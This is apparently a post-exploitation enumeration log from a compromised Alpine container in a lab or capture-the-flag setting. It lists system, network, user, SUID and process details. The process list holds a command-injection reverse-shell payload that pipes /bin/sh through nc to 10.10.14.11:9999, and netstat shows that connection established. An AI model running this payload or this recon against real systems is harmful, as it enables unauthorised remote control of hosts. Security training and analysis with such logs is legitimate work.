System/Kernel
/app # uname -a ; cat /etc/*release
linux edd84d998910 5.15.0-56-generic #62-ubuntu smp tue nov 22 19:54:14 UTC 2022 x86_64 Linux
3.10.3
NAME="Alpine Linux"
ID=alpine
VERSION_ID=3.10.3
PRETTY_NAME="Alpine Linux v3.10"
home_url="https://alpinelinux.org/"
bug_report_url="https://bugs.alpinelinux.org/"Alpine Linux 3.10.3
5.15.0-56-generic
x86_64
Networks
/app # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 02:42:AC:16:00:03
inet addr:172.22.0.3 Bcast:172.22.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1643 errors:0 dropped:0 overruns:0 frame:0
TX packets:1531 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:115077 (112.3 KiB) TX bytes:152275 (148.7 KiB)
/app # ip route
default via 172.22.0.1 dev eth0
172.22.0.0/16 dev eth0 scope link src 172.22.0.3
/app # arp -a ; netstat -ant | less
? (172.22.0.1) at 02:42:b8:c3:9b:52 [ether] on eth0
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 1 0 0.0.0.0:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.11:43703 0.0.0.0:* LISTEN
tcp 0 0 172.22.0.3:45838 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45792 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45748 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:8000 172.22.0.1:44558 TIME_WAIT
tcp 301 0 172.22.0.3:8000 172.22.0.1:55766 ESTABLISHED
tcp 0 0 172.22.0.3:45798 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45828 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:8000 172.22.0.1:52040 ESTABLISHED
tcp 0 0 172.22.0.3:45780 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45808 172.22.0.1:5432 ESTABLISHED
tcp 0 54 172.22.0.3:46139 10.10.14.11:9999 ESTABLISHED
tcp 0 0 172.22.0.3:45738 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45764 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45824 172.22.0.1:5432 ESTABLISHED
tcp 0 0 172.22.0.3:45834 172.22.0.1:5432 ESTABLISHED
Users & Groups
/app # cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
total 12K
4 drwxr-xr-x 1 root root 4.0k dec 28 08:57 ..
4 drwxr-x--- 4 1001 1001 4.0K Nov 11 2022 svc
4 drwxr-xr-x 1 root root 4.0K Nov 10 2022 .svc
/app # cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uid=1(bin) gid=1(bin) groups=1(bin),1(bin),2(daemon),3(sys)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),2(daemon),4(adm)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys),4(adm),6(disk)
uid=4(lp) gid=7(lp) groups=7(lp),7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail),12(mail)
uid=9(news) gid=13(news) groups=13(news),13(news)
uid=10(uucp) gid=14(uucp) groups=14(uucp),14(uucp)
uid=11(operator) gid=0(root) groups=0(root)
uid=13(man) gid=15(man) groups=15(man),15(man)
uid=14(postmaster) gid=12(mail) groups=12(mail)
uid=16(cron) gid=16(cron) groups=16(cron),16(cron)
uid=21(ftp) gid=21(ftp) groups=21(ftp)
uid=22(sshd) gid=22(sshd) groups=22(sshd)
uid=25(at) gid=25(at) groups=25(at),25(at)
uid=31(squid) gid=31(squid) groups=31(squid),31(squid)
uid=33(xfs) gid=33(xfs) groups=33(xfs),33(xfs)
uid=35(games) gid=35(games) groups=35(games),100(users)
uid=70(postgres) gid=70(postgres) groups=70(postgres)
uid=85(cyrus) gid=12(mail) groups=12(mail)
uid=89(vpopmail) gid=89(vpopmail) groups=89(vpopmail)
uid=123(ntp) gid=123(ntp) groups=123(ntp)
uid=209(smmsp) gid=209(smmsp) groups=209(smmsp),209(smmsp)
uid=405(guest) gid=100(users) groups=100(users)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
SUIDs
/app # find / -perm -04000 -ls -type f 2>/dev/nullSGIDs
/app # find / -perm -02000 -ls -type f 2>/dev/nullProcesses
/app # ps
PID USER TIME COMMAND
1 root 0:01 python3 -m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000
7 root 0:00 /usr/local/bin/python3 -c from multiprocessing.semaphore_tracker import main;main(4)
8 root 0:01 /usr/local/bin/python3 -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork
15 root 0:00 sh -c tar -c -f ; mkfifo /tmp/tsharv; nc 10.10.14.11 9999 0</tmp/tsharv | /bin/sh >/tmp/tsharv 2>&1; rm /tmp/tsharv #/app_backkup.tar /app/ &
18 root 0:00 nc 10.10.14.11 9999
19 root 0:00 /bin/sh
20 root 0:00 sh -i
65 root 0:00 pspython3 -m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000
Cron & Systemd
/app # crontab -l ; cat /etc/crontab ; systemctl list-timers
# do daily/weekly/monthly maintenance
# min hour day month weekday command
*/15 * * * * run-parts /etc/periodic/15min
0 * * * * run-parts /etc/periodic/hourly
0 2 * * * run-parts /etc/periodic/daily
0 3 * * 6 run-parts /etc/periodic/weekly
0 5 1 * * run-parts /etc/periodic/monthly
cat: can't open '/etc/crontab': No such file or directory
sh: systemctl: not foundSudo Version
/app # sudo --version
sh: sudo: not foundGlibc Version
/app # ldd --version
/lib/ld-musl-x86_64.so.1: cannot load --version: No such file or directory